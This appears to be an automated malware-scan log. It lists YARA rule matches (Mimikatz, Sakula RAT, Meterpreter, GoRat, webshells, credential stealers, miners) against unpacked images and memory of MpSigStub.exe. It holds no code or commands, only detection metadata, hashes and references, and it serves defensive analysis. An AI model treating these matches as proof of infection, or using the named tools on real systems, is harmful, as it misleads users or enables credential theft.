Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: CredentialStealer_Generic_Backdoor date = 2017-06-07, hash1 = edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c, author = Florian Roth, description = Detects credential stealer byed on many strings that indicate password store access, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
